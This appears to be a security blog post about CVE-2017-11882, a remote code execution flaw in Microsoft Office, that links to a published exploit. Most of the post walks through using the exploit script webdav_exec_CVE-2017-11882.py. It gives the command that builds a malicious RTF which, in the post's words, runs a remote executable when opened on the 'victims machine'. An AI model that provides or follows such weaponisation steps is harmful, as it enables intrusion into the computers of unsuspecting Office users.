CVE-2017-11882 POC, Exploit Released – Skeleton in the Closet

A 17 year old Vulnerability in Microsoft Word was disclosed recently tracked by CVE-2017-11882 which affected the major versions of Microsoft Office – Microsoft Office 2007 SP 3, Microsoft Office 2010 SP 2, Microsoft Office 2013 SP 1, and Microsoft Office 2016. This vulnerability allows attackers to run remote codes with the privileges of the current user due to the flaw in handling objects in the memory which is otherwise known as “Microsoft Office Memory Corruption Vulnerability”. You can download the white paper by clicking the link below.

[AdSense-A]Download White Paper

Exploit for this vulnerability has been released by ‘Embedi’ and is available for download in their github page.

POC

https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Instructions

Step 1

Start a Terminal and perform an update and an upgrade by executing the command

sudo apt update

sudo apt upgrade

Step 2

The code is available for download, click the below link to download

[AdSense-A]Download

Step 3

Go inside the directory and you will find a file named “webdav_exec_CVE-2017-11882.py”. This is the file that we will be using to create the exploit rtf file. Now you can execute the command

python webdav_exec_CVE-2017-11882.py -h

for help.

To create the payload execute the command

python webdav_exec_CVE-2017-11882.py -u <URL> -e <executable_file> -o <output_name>[AdSense-B]When this file is opened in the victims machine, the executable file will start to run.

Source: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

https://github.com/embedi/CVE-2017-11882